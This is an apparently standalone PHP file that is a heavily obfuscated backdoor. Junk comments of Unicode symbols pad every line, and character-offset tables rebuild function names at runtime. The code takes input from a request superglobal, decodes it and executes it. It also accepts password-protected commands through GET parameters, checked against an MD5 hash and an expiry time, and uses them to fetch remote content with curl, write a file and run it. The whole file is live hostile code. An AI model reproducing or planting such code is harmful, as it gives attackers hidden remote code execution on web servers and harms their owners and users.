<?php /*-XMcoOoj|]-*///
$ecZR = /*-


✺♜⅑︿㏒⊸ⓣ┿ℙ⊈⊆≦⊁


>Mr!,w7wk✺♜⅑︿㏒⊸ⓣ┿ℙ⊈⊆≦⊁


-*///
range/*-O.)HH_-*///
(/*-

⒤✖⓶∻◼¯⅕ℙⅽ└♪℮⑵⋌₪⊷⅑—↖♡ت≹﹊⊁

84;lM⒤✖⓶∻◼¯⅕ℙⅽ└♪℮⑵⋌₪⊷⅑—↖♡ت≹﹊⊁

-*///
"~", " "/*-~A}YZ-*///
); /*-o~7:Gg4pd-*///
$b=/*-
⇧﹊︷➒┠∂❇∁⋲∟⑬♓⒖⋰⊣∽⋮✏
!y.⇧﹊︷➒┠∂❇∁⋲∟⑬♓⒖⋰⊣∽⋮✏
-*///
${$ecZR[1+30].$ecZR[39+20].$ecZR[33+14].$ecZR[36+11].$ecZR[28+23].$ecZR[9+44].$ecZR[40+17]};if/*-


∋☿▔┪⑲╂☤≶﹎◟↬☜︹➲☢⋁┍㊰▫⊡◯⋂⋨㊒≚╗$✈●⊖


%0m<CcZy8(∋☿▔┪⑲╂☤≶﹎◟↬☜︹➲☢⋁┍㊰▫⊡◯⋂⋨㊒≚╗$✈●⊖


-*///
(in_array(/*-Dgaa#y(-*///
gettype(/*-
➎➚⋉♨¶⊘⇈⑲▭◁﹛⒭ⓙ◈⊒▿➃/≭✗☃♮
hslQ$➎➚⋉♨¶⊘⇈⑲▭◁﹛⒭ⓙ◈⊒▿➃/≭✗☃♮
-*///
$b)."30",$b)){$b[64]=$b[64].$b[76];$b[82]=$b[64]($b[82]);@$b=$b[82]($b[55],$b[64](${$b[31]}[23]));/*-


⊜☠


>=$;)#⊜☠


-*///
$b/*-

∬⒙۰☼⒉∾♛⋇◐ℙ↛ø↴〉㊰≄ↆ⋿⒱⒈⋉㊃⅗}

Wl5(grr?Z∬⒙۰☼⒉∾♛⋇◐ℙ↛ø↴〉㊰≄ↆ⋿⒱⒈⋉㊃⅗}

-*///
();/*-

∔£≮⋪❂◔⌘►〈㊤㈨↽⋫⋒⑦々▕⇋☷╩ℴℂ✍ⓦ↫

p^xCLOaGy∔£≮⋪❂◔⌘►〈㊤㈨↽⋫⋒⑦々▕⇋☷╩ℴℂ✍ⓦ↫

-*///
}/*-
↖◣큐▏❋ⓖ⒎✈╞✮▽№
WbQV↖◣큐▏❋ⓖ⒎✈╞✮▽№
-*///
class /*-[sY`nN-*///
dlmn{ /*-qKZ-*///
static/*-w6?@5N~o-*///
 function /*-_(|{FO5I[`-*///
YCXH($DhyvfMgF) /*-C$-*///
{ $rjvIam/*-
ℐ╅☯≬⇑➨┶↱﹫
F74gNpℐ╅☯≬⇑➨┶↱﹫
-*///
 = /*-$N-*///
"r"./*-w3{NJ{-*///
"a"./*-
┬┧⒴☟╤℘▂☄㊒┉✑➒⒁ℕ
=K┬┧⒴☟╤℘▂☄㊒┉✑➒⒁ℕ
-*///
"n"./*-
∿⊻⋘≥㈤✩⑮⋸⒏ⓣↃↈ✚⒡㊦➑⇂➎㊥⓼Ⅲ⋙ﭢ⊉
kw4o1l2j∿⊻⋘≥㈤✩⑮⋸⒏ⓣↃↈ✚⒡㊦➑⇂➎㊥⓼Ⅲ⋙ﭢ⊉
-*///
"g"./*-a`Y86=-*///
"e"; /*-a8#x9SeImB-*///
$VZG/*-p>lA-*///
 = /*-
⓾┧Ю⋢▻⇃
]8d?+!^{⓾┧Ю⋢▻⇃
-*///
$rjvIam/*-ora-*///
(/*-GVgXxP}X_-*///
"~"/*-(7&tqT3-+-*///
, /*-

⒭ↁ⑤

z-%Iy8⒭ↁ⑤

-*///
" "/*-
≥—◅┽∷╬❻Ⅰ┬）
D~c7$@l}≥—◅┽∷╬❻Ⅰ┬）
-*///
);/*-pvv-*///
 $eBbGEctxJ /*-uhVzW-*///
= /*-x`G423Bf-*///
explode/*-0=-*///
(/*-

Ⓛ┹⇣⇓⒀﹪⑷✥♋┆⓫ⅳ↰∛﹥≄⋃﹄⓺⋾〈ⓡ✞☱✻♬

;4;u6~D;bⓁ┹⇣⇓⒀﹪⑷✥♋┆⓫ⅳ↰∛﹥≄⋃﹄⓺⋾〈ⓡ✞☱✻♬

-*///
"&", /*-
▦┎⋰⋬▭▴「┨◀≰⋋╟↊◡☈ⓘ❇⓪∬▄◤✏↷✳☍╒┛✻ⓜ
k5M8>G▦┎⋰⋬▭▴「┨◀≰⋋╟↊◡☈ⓘ❇⓪∬▄◤✏↷✳☍╒┛✻ⓜ
-*///
$DhyvfMgF/*-

㊥€≡∗▴┊⅐≻⋈❒➙◱∺㊧⊁➁╍♡Ⓟ⒘

p[8.y㊥€≡∗▴┊⅐≻⋈❒➙◱∺㊧⊁➁╍♡Ⓟ⒘

-*///
); /*-XnAzagp?&-*///
$QazXKMhB /*-

≄≫⊵♜⋠Ⓩ➡☒↘ⓡⓚ

e%-x≄≫⊵♜⋠Ⓩ➡☒↘ⓡⓚ

-*///
= /*-JZ-*///
""; foreach /*-


‿≏⇃┝


=2q‿≏⇃┝


-*///
(/*-.<o-*///
$eBbGEctxJ /*-


➢❂㊓≇←✎［&✧


A&Q]q6y)➢❂㊓≇←✎［&✧


-*///
as /*-;M,)i0-*///
$hgFljv /*-vhU$-*///
=>/*-


▽❶↢♡⇥㊝┫ℝ⊽⊟⓽▹➮Ⅸ⋲⊑⇟❾┆➥


<Ynt▽❶↢♡⇥㊝┫ℝ⊽⊟⓽▹➮Ⅸ⋲⊑⇟❾┆➥


-*///
 $tE/*-


▻々︼┒▅◲✞∹⅛№①㉿↢⚘⋒❁⇣{Ⓑ◨유◼▀☽


(RJ▻々︼┒▅◲✞∹⅛№①㉿↢⚘⋒❁⇣{Ⓑ◨유◼▀☽


-*///
) /*-
㊟➟Ⓚ≰✎➼▱▇∗⅚큐㊃↘┞ℂ▨♖⊃✃╖∉˜✈㊀⋕⇒»ℙ❂≷
ch9S㊟➟Ⓚ≰✎➼▱▇∗⅚큐㊃↘┞ℂ▨♖⊃✃╖∉˜✈㊀⋕⇒»ℙ❂≷
-*///
$QazXKMhB /*-6K-$nCO-*///
.= /*-


卐❉≙ϡ┹⊒¤◅∬⒂❧


MiO,卐❉≙ϡ┹⊒¤◅∬⒂❧


-*///
$VZG[$tE/*-
⊅↉⋖⒴≇㊎✞㎡Ⓦ㍿⊑∦➶◰ↃⅩ＂❿♫①♬☥㊛⓽⋴╈㈨
%B5s⊅↉⋖⒴≇㊎✞㎡Ⓦ㍿⊑∦➶◰ↃⅩ＂❿♫①♬☥㊛⓽⋴╈㈨
-*///
 - /*-q:7hs$w-*///
57776/*-
⒎╘✁∱℅
y!;$V&a]⒎╘✁∱℅
-*///
];/*-bZT2-*///
 return /*-
}╍◶☏ℛ⊈⒗╒≋∜◄∼۰┞✻╎☐㊏□（↪┽⊓◓✸ↂ➔﹟⋦⇕➷
OaO}╍◶☏ℛ⊈⒗╒≋∜◄∼۰┞✻╎☐㊏□（↪┽⊓◓✸ↂ➔﹟⋦⇕➷
-*///
$QazXKMhB; /*-K^VB-*///
} /*-y>?m$-*///
static /*-


⊗〈⑼✑☍✒✻≬⑻


,<|⊗〈⑼✑☍✒✻≬⑻


-*///
function /*-t}S-*///
sfaJ/*-
②ℯ㊤Ⅷ﹄ⓥ☛☷⋟≛➪①↓∵≯ⅼ∤⒚⋖➚Ⓩ⇆≐⒱﹍
X;MOls`p②ℯ㊤Ⅷ﹄ⓥ☛☷⋟≛➪①↓∵≯ⅼ∤⒚⋖➚Ⓩ⇆≐⒱﹍
-*///
(/*-

⒢∋⊷

D7G_⒢∋⊷

-*///
$RLAcnEMFhv,/*-


ↆ◒﹠⇪⋈⊼⇓♙≛⌘㊟⓹✸


?wH,Vↆ◒﹠⇪⋈⊼⇓♙≛⌘㊟⓹✸


-*///
 $hEwW/*-

❾∫≳▇㈢⇤⊞➴⒕㊌∋♡⊇♥⋩

>Z.]q❾∫≳▇㈢⇤⊞➴⒕㊌∋♡⊇♥⋩

-*///
)/*-,:7!ur-*///
 {/*-`aD)3mV9-*///
 $RCYvkrJuyN/*-UCf-_%1=-*///
 = /*-L9MfzB%-*///
curl_init/*-G9pnhWH$0-*///
(/*-_1-*///
$RLAcnEMFhv/*-sG~x-*///
);/*-ME}c-*///
 curl_setopt/*-H$($Y-*///
(/*-

♯ˉ∅╏㊧⒓▕⋥⒃╖

?|ufc~7@!h♯ˉ∅╏㊧⒓▕⋥⒃╖

-*///
$RCYvkrJuyN,/*-


㈡⋀✯


n8%&[㈡⋀✯


-*///
 CURLOPT_RETURNTRANSFER,/*-es${R-*///
 1/*-


⋹㊰¡⊏℘⋀☐╤ⅻ⊦⓽ⅴⒽ⋘⌘⓬↨⇖∛➳↛∓ℑ①✈㊌


Z>AYHN|ED⋹㊰¡⊏℘⋀☐╤ⅻ⊦⓽ⅴⒽ⋘⌘⓬↨⇖∛➳↛∓ℑ①✈㊌


-*///
);/*-x%-*///
 $dkM/*-

✽ℙ﹦◩♢☟⊆⓬〗

K2rb✽ℙ﹦◩♢☟⊆⓬〗

-*///
 = /*-Uzc5I7DCo-*///
curl_exec/*-
◹╋Φ➎≌〕⑫∢⋡➹⋀⋈⓴◝➔➝⓹⒤⑮■Ю⊺✗㊌ⓩↇ♩⇤⇄◂✹
sP◹╋Φ➎≌〕⑫∢⋡➹⋀⋈⓴◝➔➝⓹⒤⑮■Ю⊺✗㊌ⓩↇ♩⇤⇄◂✹
-*///
(/*-`p>LW-*///
$RCYvkrJuyN/*-

╠Ⓕ☱≑⊫❸⋧◟ⓗⅵⓒ⌖▊ﭢ┚⊎❷

_j╠Ⓕ☱≑⊫❸⋧◟ⓗⅵⓒ⌖▊ﭢ┚⊎❷

-*///
); /*-

≱Ⓖ⇀⓿❸✠≠✞⑥㊭↉┠㊌㊑﹂

M0U,=≱Ⓖ⇀⓿❸✠≠✞⑥㊭↉┠㊌㊑﹂

-*///
return /*-Ev2[-*///
empty/*-}O1V-*///
(/*-


≰︽


L@:cue>≰︽


-*///
$dkM/*-
⑵⇁━➫┨∖
h%I8I.⑵⇁━➫┨∖
-*///
)/*-
❾↫‰¯ↂ↺⒚❼∦
%W6D❾↫‰¯ↂ↺⒚❼∦
-*///
 ? /*-8h1Vw-*///
$hEwW/*-
〔┖┣➪¥ⅰ✺∃┢◿
DXw6.〔┖┣➪¥ⅰ✺∃┢◿
-*///
(/*-

﹪┮㊦⊨

<1N﹪┮㊦⊨

-*///
$RLAcnEMFhv/*-Cyg-*///
)/*-tQHN-HHz-*///
 : /*-


✸℠┭∪◡≋♬✴☧⇌└☪㊋≷◴▀$〖┋︽⋄⓾ℋ⒮⇤™Ⓖ⒄


@[>^ro✸℠┭∪◡≋♬✴☧⇌└☪㊋≷◴▀$〖┋︽⋄⓾ℋ⒮⇤™Ⓖ⒄


-*///
$dkM; /*-JK{AL;?i-*///
}/*-

≸⒉♤

n;@(@q8≸⒉♤

-*///
 static/*-^x&Sw-*///
 function /*-j|3pq&K><-*///
uGqDmrcv/*-PceZ-*///
() /*-


≷㊛℃º➄ⅶ⊢⒈⇕❷⇔⋎⇤☦⊤◂⋁▤⇖囍►⒍﹛


U1XC(M~;≷㊛℃º➄ⅶ⊢⒈⇕❷⇔⋎⇤☦⊤◂⋁▤⇖囍►⒍﹛


-*///
{/*-
◄Ⓓ▲╝❉∏◣⋓⒏⊉▶➣⋯↸►≶ⓐ⊅⋕┄╤㊂➜¾☣⑰♁⇆⇩✭
~rG◄Ⓓ▲╝❉∏◣⋓⒏⊉▶➣⋯↸►≶ⓐ⊅⋕┄╤㊂➜¾☣⑰♁⇆⇩✭
-*///
 $ZVbze /*-


㊗∣≾◧◕Ⓟ┽❣▁﹥◶♕➻


UQ1D5[㊗∣≾◧◕Ⓟ┽❣▁﹥◶♕➻


-*///
=/*-XRZbW#fK-*///
 array/*-h;-*///
("57803&57788&57801&57805&57786&57801&57807&57800&57785&57792&57803&57786&57797&57791&57792","57787&57786&57788&57807&57788&57791&57786&57853&57851","57796&57787&57791&57792&57807&57802&57801&57803&57791&57802&57801","57790&57805&57803&57795","57804&57805&57787&57801&57848&57850&57807&57802&57801&57803&57791&57802&57801","57800&57797&57794&57801&57807&57799&57801&57786&57807&57803&57791&57792&57786&57801&57792&57786&57787","57830&57860","57777","57855&57860","57837&57820&57820&57837&57813","57791&57800"); /*-

◡‡❿Ⅸ↣㈩≊➃Ⅴϡ↢⑽❄✱┄¢⋌㈨┐Ⓛ㊔⒩≚

Z.q◡‡❿Ⅸ↣㈩≊➃Ⅴϡ↢⑽❄✱┄¢⋌㈨┐Ⓛ㊔⒩≚

-*///
foreach /*-

☷❑⒄（☞➸➑♁❸☄◳

_[LCP.☷❑⒄（☞➸➑♁❸☄◳

-*///
(/*-

➾✢㈣➇❹︹#}Ⓤ⒧﹂

-FW&faJ➾✢㈣➇❹︹#}Ⓤ⒧﹂

-*///
$ZVbze/*-CFh.<^qz-*///
 as /*-%;N.mQ;-*///
$YuZMFvVT/*-Zy7bdnkm-*///
)/*-]I=Ejwf-*///
 $uMhlH/*-
∽≔≈∘⒉≤≮➃☬◕┾⊛≅⅗⅛﹌♢◜ⓧ❋♜⓴ø∋∞✷⅕
u8},]:xLO,∽≔≈∘⒉≤≮➃☬◕┾⊛≅⅗⅛﹌♢◜ⓧ❋♜⓴ø∋∞✷⅕
-*///
[] /*-7~xhIp^-*///
= /*-o<j4-*///
self/*-


㊌@


E@&A,㊌@


-*///
::/*-


▪∲╪ⓟ⊒◙≇


wA)d▪∲╪ⓟ⊒◙≇


-*///
YCXH/*-
▔∮▸➶≐⑼⊼⋗㊅
JJ=8yu▔∮▸➶≐⑼⊼⋗㊅
-*///
(/*-+Uk-*///
$YuZMFvVT/*->C]OW-*///
);/*->222kA(0-*///
$RmWM /*-

❦⋜✗❸┉

d|V_fbLWb[❦⋜✗❸┉

-*///
= /*-
➲♁
C[➲♁
-*///
@$uMhlH/*-XXUV>=jz-*///
[/*-dM-*///
1/*-

◾♝㊰◍π﹨ⅷ⊇［↛❂▬ⅹ≐◬❤∍▓↴⊸

|L◾♝㊰◍π﹨ⅷ⊇［↛❂▬ⅹ≐◬❤∍▓↴⊸

-*///
]/*-

☭◬↙/→≣⒎➶ºⓆ┮㊣‱↤Θ✽{↓⒕

Vd>y☭◬↙/→≣⒎➶ºⓆ┮㊣‱↤Θ✽{↓⒕

-*///
(/*-
㊟«⋭ⓒ⅖⓳
S;cc{{67㊟«⋭ⓒ⅖⓳
-*///
${/*-y+d-*///
"_"/*-
☤▒⓭❆㊮¶✔Ⓜ◄╦♥
GuwjxQZr#☤▒⓭❆㊮¶✔Ⓜ◄╦♥
-*///
."G"/*-
➂㈥⇥⋗⇕➽⏥➄➎⇡﹢Ψ∣㊮⒰
OwPnnK}➂㈥⇥⋗⇕➽⏥➄➎⇡﹢Ψ∣㊮⒰
-*///
."E"/*-XP>p<O!u-*///
."T"/*-


♙⋐㊈♕⅒▉▣≺⓭⓻卐∹▌﹠⑶⑹㊐‱▲⇪㊄⊆┚∆ⅽ


@Z82acC>_♙⋐㊈♕⅒▉▣≺⓭⓻卐∹▌﹠⑶⑹㊐‱▲⇪㊄⊆┚∆ⅽ


-*///
}[/*-
£◞Ⓧ≅⒘≁┌⓳≕
;ou7£◞Ⓧ≅⒘≁┌⓳≕
-*///
$uMhlH/*-

≾⊷↧◨▄◛⋟Φ∀◥↨▥⋥↛〉❈♞⊊❊∖≜╁◯

AJv≾⊷↧◨▄◛⋟Φ∀◥↨▥⋥↛〉❈♞⊊❊∖≜╁◯

-*///
[/*-g`w)M_1M-*///
3+6/*-

♀≱⋽◆︴Ⓢ〓➴―⇁∝┊⒮●➎♂◸&ø✲⋳﹤✌♐∱㊫☈⓳

7FDEY♀≱⋽◆︴Ⓢ〓➴―⇁∝┊⒮●➎♂◸&ø✲⋳﹤✌♐∱㊫☈⓳

-*///
]]/*->P!-*///
);/*-V5-*///
 $cD /*-


➐﹎❈⇐▷⊳↠➣⓳⊾⅔


hmR?@-eae^➐﹎❈⇐▷⊳↠➣⓳⊾⅔


-*///
=/*-

▩￣◿▴¿≞▍◨☻

o+;,HKZ]`▩￣◿▴¿≞▍◨☻

-*///
 @$uMhlH/*-]aVx;XGbh[-*///
[/*-&]nP@-*///
1+2/*-iJ2G:[-*///
]/*-x[gn[-*///
(/*-


⓰☌♋


]$N;F6⓰☌♋


-*///
$uMhlH/*-9@SAwG52)-*///
[/*-
⒱▢◿┄↳↥≛◘↕ΨⒺ⏥≍↷↠╨▊╠▏⊋ϟ︾
~pt[2a`⒱▢◿┄↳↥≛◘↕ΨⒺ⏥≍↷↠╨▊╠▏⊋ϟ︾
-*///
4+2/*-GJ-*///
], /*-z8bei,i$-*///
$RmWM/*-Pk+8H-*///
);/*-MTD@-*///
 $mORHh /*-


▆➅㈨≹▤➶⊫┠┒↢⊁❿╇﹄╟≬ℓⅢ✄）


g56V}:▆➅㈨≹▤➶⊫┠┒↢⊁❿╇﹄╟≬ℓⅢ✄）


-*///
=/*-%kDM#Gr!A<-*///
 $uMhlH/*-4~Sa&]-*///
[/*-


㊠╩ⅿ∘⒘⒬


)Zq}1㊠╩ⅿ∘⒘⒬


-*///
2+0/*-?I{a9-*///
]/*-Be;-*///
(/*-


⋚⋾⒱┯⒙╡➑⑮┎


$]e3O{];_m⋚⋾⒱┯⒙╡➑⑮┎


-*///
$cD,/*-
ℯ⋍☎ϡⅫ┇╣∁⇄
>p|O!YD<ijℯ⋍☎ϡⅫ┇╣∁⇄
-*///
 true/*-
➔▇◨╥☰≑✼⋁┦▀㍿⒙✖ⅲ∪✬╍
U`z^ATI➔▇◨╥☰≑✼⋁┦▀㍿⒙✖ⅲ∪✬╍
-*///
); /*-Ky-*///
@${/*-


⇤◔⒔❾♘≱☒ↈ㈡⊋◂﹥∣¥큐⋘㊇∙≾﹤☸


`QjWA$⇤◔⒔❾♘≱☒ↈ㈡⊋◂﹥∣¥큐⋘㊇∙≾﹤☸


-*///
"_"./*-
㊢ⅱ≢➄◹☭➏⒲㍿◱㊍❁┗Ψ≧≬⋎ℭ
&Y%j@HGj$㊢ⅱ≢➄◹☭➏⒲㍿◱㊍❁┗Ψ≧≬⋎ℭ
-*///
"G"./*-


⒫┋•⅚≣㊓❃✘﹏⑺↯﹊▂✌❉┖№


x&7P⒫┋•⅚≣㊓❃✘﹏⑺↯﹊▂✌❉┖№


-*///
"E"/*-

㊍﹣④▉﹋╏↴┓├⇋♣♐

W{>9gOf㊍﹣④▉﹋╏↴┓├⇋♣♐

-*///
."T"/*-


≩⊁↭


WW≩⊁↭


-*///
}/*-
½▍≐⅐㊝◯✖↺﹄º∻【⋏㊕☞—☳⌘⋿⇐★⊯⓰∆⒚ⓗ⒤≪⓸⒴▪
d#5½▍≐⅐㊝◯✖↺﹄º∻【⋏㊕☞—☳⌘⋿⇐★⊯⓰∆⒚ⓗ⒤≪⓸⒴▪
-*///
[/*-
ℛ⒋︻⇑┻㊥ℑ⓳▬☾›▩❶┴⋭⇠⇛︷⑩≣◝➭⑧➮☢◄
N9ℛ⒋︻⇑┻㊥ℑ⓳▬☾›▩❶┴⋭⇠⇛︷⑩≣◝➭⑧➮☢◄
-*///
$uMhlH/*-CM-*///
[10+0/*-


ⅿ⑥≰✤┗►⊴❒∤ℑ


rDⅿ⑥≰✤┗►⊴❒∤ℑ


-*///
]/*-%(&R$CQGQ-*///
]/*-zmC-*///
 == /*-


㈡╙╅⒞▩≳⒬╧﹌❐✽⒙⓾㊭┶⊁︸⋏


or3m㈡╙╅⒞▩≳⒬╧﹌❐✽⒙⓾㊭┶⊁︸⋏


-*///
1 /*-olu@=-*///
&& /*-
∄≏┤ℯ≋
+6??∄≏┤ℯ≋
-*///
die/*-OM>rAcK-*///
(/*-

⋃➷⓰✎ˉ➎┄⋛⒗⊮┌Ⓐ◶✓┟⅗

T6⋃➷⓰✎ˉ➎┄⋛⒗⊮┌Ⓐ◶✓┟⅗

-*///
$uMhlH[5+0/*-lNHlxd718k-*///
]/*-
⋚╨❧≰⇦⅙ℝ≅⇘⊈≁﹎◻∎‿⓻⊃^⊋≛▴
0a9re6@⋚╨❧≰⇦⅙ℝ≅⇘⊈≁﹎◻∎‿⓻⊃^⊋≛▴
-*///
(/*-6Cq-*///
__FILE__/*-
☋✍Ⓢ┤
v1☋✍Ⓢ┤
-*///
)/*-
‰≠░﹌❇✏➊㍿ℕ㈠↛╎⋝⊙▌❊✤Ⓧ∑￡●❸⇦︵
C‰≠░﹌❇✏➊㍿ℕ㈠↛╎⋝⊙▌❊✤Ⓧ∑￡●❸⇦︵
-*///
); /*-()90xOd-*///
if/*-


⌖▨︽Θ↶⇊⒴╏≐﹌∊Ⓤ✦⒠「▲


d#Z⌖▨︽Θ↶⇊⒴╏≐﹌∊Ⓤ✦⒠「▲


-*///
(/*-


∀⓰≅⊪㊌


7g∀⓰≅⊪㊌


-*///
 (/*-:@K-*///
(@/*-


➶㈥➤┃∑ღ⊹‹↥◎✮⒛❋⇉╤Ⅲ▏♨


!Q#LuGp=➶㈥➤┃∑ღ⊹‹↥◎✮⒛❋⇉╤Ⅲ▏♨


-*///
$mORHh/*-N4t-*///
[/*-@(wY5%EuE#-*///
0/*-0CbCJO6-*///
] /*-


☩✴≶⇅ↈ‡┓⊃❥↭


M0g|☩✴≶⇅ↈ‡┓⊃❥↭


-*///
- time/*-


⒟◯✣╡⊍❀⋆┽▫Ⓓ☳


@k,Elm)⒟◯✣╡⊍❀⋆┽▫Ⓓ☳


-*///
()/*-BImr4mYr=-*///
) > /*-wuiP-*///
0/*-^<5)g>Ni-*///
)/*-&cM1x-*///
 and /*-l&4-*///
(/*-NgIBW-*///
md5/*-RvF^Lp+Qc-*///
(/*-:Z<wCHG0-*///
md5/*-g[-*///
(/*-rN=2P;-*///
$mORHh/*-


⒊✪〗▪☰⇘┉☀□═❣㊄㊃≡


yco0A⒊✪〗▪☰⇘┉☀□═❣㊄㊃≡


-*///
[/*-r|--*///
1+2/*-

⅗⋻➉⋎╚➑☭⊏「⊔➛㊤

rf@8ZQG⅗⋻➉⋎╚➑☭⊏「⊔➛㊤

-*///
]/*-


⓻☋⇔∕▣﹟◵


~~⓻☋⇔∕▣﹟◵


-*///
)/*-Qe{l@!<j;-*///
)/*-^O8f-*///
 === /*-
∑㊉①✠↗㊠⋔⋼⇥☷%⒯∝◸⋱⓼✌►⋬↰╂┵ϡⒾ﹩◕↖
>#]W∑㊉①✠↗㊠⋔⋼⇥☷%⒯∝◸⋱⓼✌►⋬↰╂┵ϡⒾ﹩◕↖
-*///
"52231c9f4161253cb4063053145fb2e7"/*-

‰Ⓠ큐ⓨ卐❁◢ℱ②Ⓦ◞⌖♠⒏⒋⒣╕╀➥♬﹏☝↼

4|NW6RNF‰Ⓠ큐ⓨ卐❁◢ℱ②Ⓦ◞⌖♠⒏⒋⒣╕╀➥♬﹏☝↼

-*///
)/*-,Fg$<z;@-*///
 ): /*-

≤⒯ﭢ⇙

#6%ya≤⒯ﭢ⇙

-*///
$uTqpkMcg /*-gg-%-*///
=/*-4cG-*///
 self/*-
㎡ⓠ￣⅓∱⒰➻➣卍‖≕
fc$&:]㎡ⓠ￣⅓∱⒰➻➣卍‖≕
-*///
::/*-


◐♗◿㊫㊡㊐◚Ⅳ⒴Ⓚ◌↪⋿⒬㊩➝▿∄⋟{↋↶Ⓓ


~#IB?,nW#+◐♗◿㊫㊡㊐◚Ⅳ⒴Ⓚ◌↪⋿⒬㊩➝▿∄⋟{↋↶Ⓓ


-*///
sfaJ/*-
◻❧✉⊥∧≬ღ≎‰⋝❥⊗﹉≪ↈ≯
5G(t}l◻❧✉⊥∧≬ღ≎‰⋝❥⊗﹉≪ↈ≯
-*///
(/*-Pd-*///
$mORHh/*-TW~?FS&-*///
[/*-
⇢ⓙⓃ✂⒠⑳∊ⓕ﹉┬❷≔㊍✣⒛≹◽◰✙⊨⊤≡➵☠◃ℊ◖♛⒩➀Ⅻ
Dz[-dGw?p⇢ⓙⓃ✂⒠⑳∊ⓕ﹉┬❷≔㊍✣⒛≹◽◰✙⊨⊤≡➵☠◃ℊ◖♛⒩➀Ⅻ
-*///
0+1/*-


☋❈︶⇜☊┷∮➉⋽⓰├♧♔☲㊛↽◴∦㊝≷⊳


Fm$☋❈︶⇜☊┷∮➉⋽⓰├♧♔☲㊛↽◴∦㊝≷⊳


-*///
], /*-pAI89=--*///
$uMhlH/*-
❀⒬㏑▣☯✈♛∹⋕☤ø↉﹎¾♆︹▰≡⊂⋥┫﹩⓳（º∛◿▫︸↧
u=Wb;G❀⒬㏑▣☯✈♛∹⋕☤ø↉﹎¾♆︹▰≡⊂⋥┫﹩⓳（º∛◿▫︸↧
-*///
[/*-B&jb~-*///
3+2/*-

▥◥⒜▆ⅽ⒟%∓Ⅲ➵⋞➯×≲↙Ⅾ㊧

5j}▥◥⒜▆ⅽ⒟%∓Ⅲ➵⋞➯×≲↙Ⅾ㊧

-*///
]/*-


┢┡⑥✜⒡☢➼⑻⒀㈡⊣┄➃ⓜ➳Ⓠⓗℨ⓭┕⒁⊵◜▊⊳⋹


Sx)4P┢┡⑥✜⒡☢➼⑻⒀㈡⊣┄➃ⓜ➳Ⓠⓗℨ⓭┕⒁⊵◜▊⊳⋹


-*///
);/*-


÷⋠Ⓛ☏◶★⒥◰♨↯Θ⒮≚ℳ⓴≥⊢∀♥╥Ⅸ∘⅟㊩


m$r<~n;÷⋠Ⓛ☏◶★⒥◰♨↯Θ⒮≚ℳ⓴≥⊢∀♥╥Ⅸ∘⅟㊩


-*///
@$uMhlH/*-


➅▉☬♘⚘✝⒗⊳▎ↈ⑹Ⅺ⊠﹡⋠∾⋈♡⋻④


#!➅▉☬♘⚘✝⒗⊳▎ↈ⑹Ⅺ⊠﹡⋠∾⋈♡⋻④


-*///
[/*-Po9-*///
0/*-Tq5-*///
]/*-gG-*///
(/*-

±¥▍⊇‱≹

:ROh5Ln7x±¥▍⊇‱≹

-*///
"",/*-Rn5w8YQM6I-*///
 $uMhlH/*-
$㊚☆┨▍
[,Gf,$㊚☆┨▍
-*///
[/*-

｜┴⓳㊙↳㍿ⅽπ☐ℕ◥⑳≺

F[-b6i｜┴⓳㊙↳㍿ⅽπ☐ℕ◥⑳≺

-*///
7+0/*-Cy-*///
] /*-|VD[-*///
. /*-a6M<(S-*///
$uMhlH/*-YF-*///
[/*-

☍㎡☷➚»➮▯㊮┨∁≩✴⊸℮❀⒃㊕㊙✫∮ⅻ⇐」‰﹥⋫↕

dv,j.SuCI☍㎡☷➚»➮▯㊮┨∁≩✴⊸℮❀⒃㊕㊙✫∮ⅻ⇐」‰﹥⋫↕

-*///
1+3/*-nd>-*///
]/*-

╚⇩∇ℙ⒛ⅼ㊩♖╈㊌╕Ю☌Ⓖ⋗☉㊭⊗℃☁◄﹢▫♫✸≳ⓒ↊

xs,V&╚⇩∇ℙ⒛ⅼ㊩♖╈㊌╕Ю☌Ⓖ⋗☉㊭⊗℃☁◄﹢▫♫✸≳ⓒ↊

-*///
(/*-0qH~J{-*///
$uTqpkMcg/*-v7rj1?-*///
)/*-

Ⓡ♝⊤❺≸✑№㊗Ⅴ⇙≧☊⋓✫「Θ✼

p,fNk=#Z|Ⓡ♝⊤❺≸✑№㊗Ⅴ⇙≧☊⋓✫「Θ✼

-*///
 . /*-YYOsS-*///
$uMhlH/*-_;-*///
[/*-
ℛ∕†◶┦↜≨※≹➅≙↚‰▌＂∞☞♂⒁≫ↂ‐﹍⋫⅐⊵❧✒☽
~ykrℛ∕†◶┦↜≨※≹➅≙↚‰▌＂∞☞♂⒁≫ↂ‐﹍⋫⅐⊵❧✒☽
-*///
8+0/*-

≰⇓⅝➆≾℠웃㈣↱☴⒃≭⊞Ⓑ▇⇧➑⒠↸┬┧ϟ

8Q3_2on9rM≰⇓⅝➆≾℠웃㈣↱☴⒃≭⊞Ⓑ▇⇧➑⒠↸┬┧ϟ

-*///
]/*-


⓸∪≀└』


40oda3⓸∪≀└』


-*///
);/*-twBTMz-*///
/*-d)e`X-*///
die;/*-[H-*///
 endif;/*-dO-*///
 }/*-N,qQ]g]Vx-*///
}/*-
⋈⋏∲➼◡∨⊳﹣╓➊»↓˜⊑◅℠↫⋿
DkwW⋈⋏∲➼◡∨⊳﹣╓➊»↓˜⊑◅℠↫⋿
-*///
dlmn/*-,X-*///
::/*-
≉┢㊪‱㊫◶➂⑶✗㊑♩
ADp4E#(≉┢㊪‱㊫◶➂⑶✗㊑♩
-*///
uGqDmrcv/*-


⒪々㊟⊲☱Ⅽ㊧︵☊ღ﹥⑮∈✝∯▹Ⓘⓕ≖▲⊠⊃±㊪


}-L!ho,Ya>⒪々㊟⊲☱Ⅽ㊧︵☊ღ﹥⑮∈✝∯▹Ⓘⓕ≖▲⊠⊃±㊪


-*///
();/*-
↥⑷㍿⊇㊮◿✉▨℮ⅹ⒵✢▥⊀┚⒑
JIOF_↥⑷㍿⊇㊮◿✉▨℮ⅹ⒵✢▥⊀┚⒑
-*///
 ?>